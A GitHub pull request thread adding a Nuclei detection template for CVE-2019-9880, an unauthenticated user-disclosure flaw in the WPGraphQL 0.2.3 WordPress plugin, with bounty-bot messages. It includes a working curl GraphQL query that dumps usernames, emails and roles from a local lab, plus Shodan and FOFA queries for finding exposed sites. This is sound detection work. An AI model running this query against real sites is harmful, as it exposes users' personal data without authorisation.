ADD CVE-2019-9880 (vKEV)

[intelligent-ears]

Template / PR Information

• Added CVE-2019-9880 - WPGraphQL 0.2.3 Unauthenticated User Information Disclosure
• References:
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9880
  • http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
  • https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
  • https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/

Template Validation

I've validated this template locally

• YES

• NO

• Here's the exploit I ran locally

┌──(kali㉿kali)-[~/Desktop/wplab]
└─$ curl -X POST http://localhost:8000/?graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "query { users { nodes { id name email username roles } } }"}'
{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@test.com","username":"admin","roles":["administrator"]}]}}}

• Here's the Nuclei Debug:

┌──(kali㉿kali)-[~/…/nuclei-templates/http/cves/2019]
└─$ nuclei -u http://localhost:8000 -t CVE-2019-9880.yaml -debug   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.6

		projectdiscovery.io

[INF] Current nuclei version: v3.4.6 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/?graphql

POST /?graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.1
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/?graphql

HTTP/1.1 200 OK
Connection: close
Content-Length: 138
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 600
Content-Type: application/json; charset=UTF-8
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)
X-Content-Type-Options: nosniff
X-Hacker: If you're reading this, you should visit github.com/wp-graphql and contribute!
X-Powered-By: PHP/7.2.18
X-Robots-Tag: noindex

{"data":{"users":{"nodes":[{"id":"dXNlcjox","name":"admin","email":"intelears@gmail.com","username":"admin","roles":["administrator"]}]}}}
[CVE-2019-9880:dsl-1] [http] [critical] http://localhost:8000/?graphql ["admin","intelears@gmail.com"]
[INF] [CVE-2019-9880] Dumped HTTP request for http://localhost:8000/graphql

POST /graphql HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36
Connection: close
Content-Length: 71
Content-Type: application/json
Accept-Encoding: gzip

{"query": "query { users { nodes { id name email username roles } } }"}
[DBG] [CVE-2019-9880] Dumped HTTP response http://localhost:8000/graphql

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 16 Sep 2025 22:15:28 GMT
Server: Apache/2.4.25 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /graphql was not found on this server.</p>
<hr>
<address>Apache/2.4.25 (Debian) Server at localhost Port 8000</address>
</body></html>
[INF] Scan completed in 52.670946ms. 1 matches found.

Additional Details

• Vulnerability Type: Authentication bypass leading to information disclosure
• Attack Vector: GraphQL query to enumerate WordPress users without authentication
• Affected Versions: WPGraphQL plugin version 0.2.3 and earlier
• WordPress Setup Requirements:

SetUp Details

• WordPress installation with WPGraphQL plugin version 0.2.3 or earlier
• No authentication required - this is an unauthenticated vulnerability
• GraphQL endpoint accessible at /?graphql or /graphql

Query details:

• query { users { nodes { id name email username roles } } }
• FOFA Query: body="/wp-content/plugins/wp-graphql/"
• Shodan Query: http.title:"WordPress" "graphql"
• PublicWWW Query: "/wp-content/plugins/wp-graphql/"

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[DhiyaneshGeek]

Validated Locally

LGTM !

nuclei -u http://localhost:8080 -t test.yaml -vv   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2019-9880] WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure (@intelligent-ears) [critical]
[CVE-2019-9880:user-data] [http] [critical] http://localhost:8080/graphql ["username: test, email: test@gmail.com","username: hehe, email: hehe@test.com"]

[princechaddha]

/tip 200

[algora-pbc]

Please visit Algora to complete your tip via Stripe.

[algora-pbc]

💎 $200 bounty • ProjectDiscovery Bounty Available for CVE Template Contribution

Steps to Contribute:

• Claim attempt: Comment /attempt #13285 on this issue to claim attempt. Multiple participants can attempt, but only the first to submit a complete POC template along with full debug data will receive the reward similar to bug bounty programs.
• Write the Template: Create a high-quality Nuclei template for the specified CVE, following our Contribution Guidelines and Acceptance Criteria.
• Submit the Template: Open a pull request (PR) to projectdiscovery/nuclei-templates and include /claim #13285 in the PR body to claim the bounty.
• Receive Payment: Upon successful merge of your PR, you will receive 100% of the bounty through Algora.io within 2-5 days. Ensure you are eligible for payouts.

Thank you for contributing to projectdiscovery/nuclei-templates and helping us democratize security!

Acceptance Criteria: The template must include a complete POC and should not rely solely on version-based detection. Contributors must share vulnerable setup information or a testable instance by emailing templates@projectdiscovery.io. Providing a testable instance significantly reduces validation time and increases the chance of quicker rewards. Templates that are incomplete, invalid, or non-verifiable will not be accepted. Avoid submitting code templates for CVEs that can be detected using HTTP, TCP, or JavaScript only these are blocked by default and will not produce results. Exceptions may apply for certain cases. Do not submit AI-simulated vulnerable environments. To qualify for the bounty, the team must be able to fully validate the POC. If you have hosted a vulnerable environment for validation, send the details (IP or Docker setup) along with the PR number to templates[at]projectdiscovery.io

You can check the FAQ for the Nuclei Templates Community Rewards Program here.

Add a bounty • Share on socials

[intelligent-ears]

/attempt #13285

[algora-pbc]

🎉🎈 @intelligent-ears has been awarded $200 by ProjectDiscovery! 🎈🎊